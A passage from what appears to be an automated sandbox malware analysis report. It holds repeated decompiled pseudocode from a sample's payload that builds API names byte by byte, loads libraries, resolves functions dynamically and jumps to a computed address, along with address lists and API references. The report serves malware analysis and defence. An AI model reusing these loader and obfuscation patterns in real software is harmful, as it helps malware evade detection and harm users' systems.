				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t38) != 0) {
					goto L3;
				}
				_push(E00402749);
				return E00402749;
			}






















    0x004015ca
    0x004015cf
    0x004015d4
    0x004015d9
    0x004015de
    0x004015e0
    0x004015e3
    0x004015e8
    0x004015f4
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x004015fa
    0x00401600
    0x00401605
    0x00401607
    0x0040160a
    0x0040160f
    0x0040161c
    0x00000000
    0x00000000
    0x00401628
    0x00401629

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 004023F0, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 130synchronization
    C-Code - Quality: 48%
    			E004023F0() {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				struct HINSTANCE__* _t20;
				void* _t21;
				struct HINSTANCE__* _t24;
				void* _t25;
				void* _t26;
				long _t28;
				intOrPtr* _t30;
				intOrPtr _t31;
				void* _t36;
				signed int _t37;
				intOrPtr* _t40;
				void* _t44;
				void* _t48;
				void* _t50;
				intOrPtr* _t52;
				void* _t61;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push("zzdjjqpqaxlgt");
				_t13 = E00402E18(_t12);
				_push( *0x4050cf);
				_t14 = E00402AD0(_t13);
				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t14) != 0) {
					L1:
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t16 = E00401CAE(_t15); // executed
					if(_t16 != 0 || _t50 < 0xfd00) {
						L15:
						L16:
						goto L16;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t20 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t20;
						_t40 = "pejpCreate";
						 *_t40 = 0x70616548;
						 *((short*)(_t40 + 4)) = 0x7243;
						 *((short*)(_t40 + 6)) = 0x6165;
						_push(_t40);
						_push(_t20);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t20);
						_push(1);
						 *_t52 =  *_t52 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t21 = E00401CAE(_t20); // executed
						if(_t21 != 0) {
							goto L15;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t24 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t50 - 4)) = _t24;
						_push(_t24);
						if(_t24 == 0) {
							goto L15;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t25 = E00402E18(_t24); // executed
						_push("true");
						 *_t52 =  *_t52 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t26 = E00402BB3(_t25); // executed
						if(_t26 != 0) {
							goto L15;
						}
						_push(0x1e);
						do {
							_t28 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t52 =  *_t52 - 1;
						} while ( *_t52 != 0);
						_t52 = _t52 + 4;
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t28); // executed
						_pop(_t44);
						 *_t52 =  *_t52 +  *((intOrPtr*)(_t44 + 0x3c));
						_t48 = _t44;
						 *0x405002 = _t48 + 0xa4;
						_t30 =  *0x405002;
						_t31 =  *_t30;
						 *0x405002 = _t31;
						_t61 =  *0x405002 - 0xfff;
						if(_t61 > 0) {
							goto L15;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t61 < 0) {
							goto L15;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t36);
						 *0x40501a =  *0x40501a + _t36;
						if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							_t37 =  *0x40501a; // 0x0
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t37) != 0) {
					goto L1;
				}
				_push(E00402749);
				return E00402749;
			}
























    0x004023f0
    0x004023f5
    0x004023fa
    0x004023ff
    0x00402404
    0x0040240a
    0x0040240f
    0x00402411
    0x00402414
    0x00402419
    0x00402426
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x0040242c
    0x0040242e
    0x00402431
    0x00402436
    0x00402442
    0x00000000
    0x00000000
    0x0040244e
    0x0040244f

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 0040238F, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 130synchronization
    C-Code - Quality: 48%
    			E0040238F() {
				void* _t11;
				void* _t12;
				void* _t14;
				struct HINSTANCE__* _t18;
				void* _t19;
				struct HINSTANCE__* _t22;
				void* _t23;
				void* _t24;
				long _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				void* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;
				intOrPtr* _t40;
				void* _t44;
				void* _t48;
				void* _t50;
				intOrPtr* _t52;
				void* _t61;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t12) != 0) {
					L1:
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t14 = E00401CAE(_t13); // executed
					if(_t14 != 0 || _t50 < 0xfd00) {
						L15:
						L16:
						goto L16;
					} else {
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t18 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t18;
						_t40 = "pejpCreate";
						 *_t40 = 0x70616548;
						 *((short*)(_t40 + 4)) = 0x7243;
						 *((short*)(_t40 + 6)) = 0x6165;
						_push(_t40);
						_push(_t18);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t18);
						_push(1);
						 *_t52 =  *_t52 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t19 = E00401CAE(_t18); // executed
						if(_t19 != 0) {
							goto L15;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t50 - 4)) = _t22;
						_push(_t22);
						if(_t22 == 0) {
							goto L15;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t23 = E00402E18(_t22); // executed
						_push("true");
						 *_t52 =  *_t52 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t24 = E00402BB3(_t23); // executed
						if(_t24 != 0) {
							goto L15;
						}
						_push(0x1e);
						do {
							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t52 =  *_t52 - 1;
						} while ( *_t52 != 0);
						_t52 = _t52 + 4;
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t26); // executed
						_pop(_t44);
						 *_t52 =  *_t52 +  *((intOrPtr*)(_t44 + 0x3c));
						_t48 = _t44;
						 *0x405002 = _t48 + 0xa4;
						_t28 =  *0x405002;
						_t29 =  *_t28;
						 *0x405002 = _t29;
						_t61 =  *0x405002 - 0xfff;
						if(_t61 > 0) {
							goto L15;
						}
						asm("sbb dword [ecx], 0xa0");
						if(_t61 < 0) {
							goto L15;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t34);
						 *0x40501a =  *0x40501a + _t34;
						if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							_t35 =  *0x40501a; // 0x0
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
				}
				_push("zzdjjqpqaxlgt");
				_t36 = E00402E18(_t35);
				_push( *0x4050cf);
				_t37 = E00402AD0(_t36);
				_push(0xf);
				 *_t52 =  *_t52 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t37) != 0) {
					goto L1;
				}
				_push(E00401BF1);
				return E00401BF1;
			}
























    0x0040238f
    0x00402394
    0x00402399
    0x0040239b
    0x0040239e
    0x004023a3
    0x004023b0
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x004023b6
    0x004023bb
    0x004023c0
    0x004023c6
    0x004023cb
    0x004023cd
    0x004023d0
    0x004023d5
    0x004023e1
    0x00000000
    0x00000000
    0x004023ed
    0x004023ee

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401B90, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 130synchronization
    C-Code - Quality: 50%
    			E00401B90() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				void* _t37;
				intOrPtr* _t40;
				void* _t44;
				void* _t48;
				void* _t50;
				intOrPtr* _t52;

				_push(0xf);
				 *_t52 =  *_t52 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L3:
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L15:
						L16:
						goto L16;
					}
					__eflags = _t50 - 0xfd00;
					if(_t50 < 0xfd00) {
						goto L15;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t40 = "pejpCreate";
					 *_t40 = 0x70616548;
					 *((short*)(_t40 + 4)) = 0x7243;
					 *((short*)(_t40 + 6)) = 0x6165;
					_push(_t40);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t52 =  *_t52 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L15;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t50 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L15;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t52 =  *_t52 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L15;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t52 =  *_t52 - 1;
						__eflags =  *_t52;
					} while ( *_t52 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t44);
					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t52 + 4)) +  *((intOrPtr*)(_t44 + 0x3c));
					_t48 = _t44;
					 *0x405002 = _t48 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L15;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L15;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t50 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push("zzdjjqpqaxlgt");
				_t36 = E00402E18(_t12);
				_push(1);
				 *_t52 =  *_t52 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t36) != 0) {
					goto L3;
				}
				_push("zzdjjqpqaxlgt");
				_t37 = E00402E18(_t12);
				_push( *0x4050cf);
				E00402AD0(_t37);
				_push(E00402183);
				return E00402183;
			}





















    0x00401b90
    0x00401b92
    0x00401b95
    0x00401b9a
    0x00401ba7
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401bad
    0x00401bb2
    0x00401bb7
    0x00401bb9
    0x00401bbc
    0x00401bc1
    0x00401bcd
    0x00000000
    0x00000000
    0x00401bd3
    0x00401bd8
    0x00401bdd
    0x00401be3
    0x00401bee
    0x00401bef

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 0040162B, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 125synchronization
    C-Code - Quality: 51%
    			E0040162B() {
				void* _t11;
				intOrPtr _t13;
				struct HINSTANCE__* _t17;
				intOrPtr _t18;
				struct HINSTANCE__* _t21;
				void* _t22;
				intOrPtr _t23;
				long _t25;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr* _t41;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr* _t53;

				_push(0xf);
				 *_t53 =  *_t53 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					_push(1);
					 *_t53 =  *_t53 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t13 = E00401CAE(_t12); // executed
					__eflags = _t13;
					if(_t13 != 0) {
						L14:
						L15:
						goto L15;
					}
					__eflags = _t51 - 0xfd00;
					if(_t51 < 0xfd00) {
						goto L14;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t17 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t17;
					_t41 = "pejpCreate";
					 *_t41 = 0x70616548;
					 *((short*)(_t41 + 4)) = 0x7243;
					 *((short*)(_t41 + 6)) = 0x6165;
					_push(_t41);
					_push(_t17);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t17);
					_push(1);
					 *_t53 =  *_t53 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t18 = E00401CAE(_t17); // executed
					__eflags = _t18;
					if(_t18 != 0) {
						goto L14;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t51 - 4)) = _t21;
					_push(_t21);
					__eflags = _t21;
					if(_t21 == 0) {
						goto L14;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t22 = E00402E18(_t21); // executed
					_push("true");
					 *_t53 =  *_t53 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t23 = E00402BB3(_t22); // executed
					__eflags = _t23;
					if(_t23 != 0) {
						goto L14;
					}
					_push(0x1e);
					do {
						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t53 =  *_t53 - 1;
						__eflags =  *_t53;
					} while ( *_t53 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t25); // executed
					_pop(_t45);
					 *((intOrPtr*)(_t53 + 4)) =  *((intOrPtr*)(_t53 + 4)) +  *((intOrPtr*)(_t45 + 0x3c));
					_t49 = _t45;
					 *0x405002 = _t49 + 0xa4;
					_t27 =  *0x405002;
					_t28 =  *_t27;
					 *0x405002 = _t28;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L14;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L14;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t33);
					 *0x40501a =  *0x40501a + _t33;
					__eflags =  *((intOrPtr*)(_t51 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t51 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push("zzdjjqpqaxlgt");
				_t36 = E00402E18(_t12);
				_push( *0x4050cf);
				_t37 = E00402AD0(_t36);
				_push( *0x4050cf);
				_t38 = E00402AD0(_t37);
				_push("zzdjjqpqaxlgt");
				E00402E18(_t38);
				_push(E004014A8);
				return E004014A8;
			}






















    0x0040162b
    0x0040162d
    0x00401630
    0x00401635
    0x00401642
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401648
    0x0040164d
    0x00401652
    0x00401658
    0x0040165d
    0x00401663
    0x00401668
    0x0040166d
    0x00401678
    0x00401679

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 012A1CCE, Relevance: 10.6, APIs: 7, Instructions: 140memorytime

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 181 12a1cce-12a1cfb CreateWaitableTimerA 182 12a1d01-12a1d4e call 12a8ee8 WaitForMultipleObjects 181->182 183 12a1e56-12a1e5c GetLastError 181->183 188 12a1dad 182->188 189 12a1d50-12a1d55 call 12a1c40 182->189 184 12a1e5e-12a1e66 183->184 190 12a1daf-12a1db5 188->190 196 12a1d59-12a1d5e 189->196 192 12a1db7-12a1dbf HeapFree 190->192 193 12a1dc5-12a1dc9 190->193 192->193 193->190 195 12a1dcb-12a1dd5 CloseHandle 193->195 195->184 197 12a1d60-12a1d67 196->197 198 12a1d71-12a1d8a call 12a1b3f 196->198 197->198 199 12a1d69 197->199 201 12a1d8f-12a1d93 198->201 199->198 202 12a1dda-12a1de0 201->202 203 12a1d95-12a1da0 201->203 204 12a1e0d-12a1e15 202->204 205 12a1de2-12a1de8 202->205 203->196 206 12a1da2-12a1dab call 12a19e0 203->206 208 12a1e1b-12a1e4b _allmul WaitForMultipleObjects 204->208 205->188 207 12a1dea-12a1e0b call 12a45f0 205->207 206->188 207->208 208->196 214 12a1e51 208->214 214->188
    APIs
    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 012A1CEF
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012A1D44
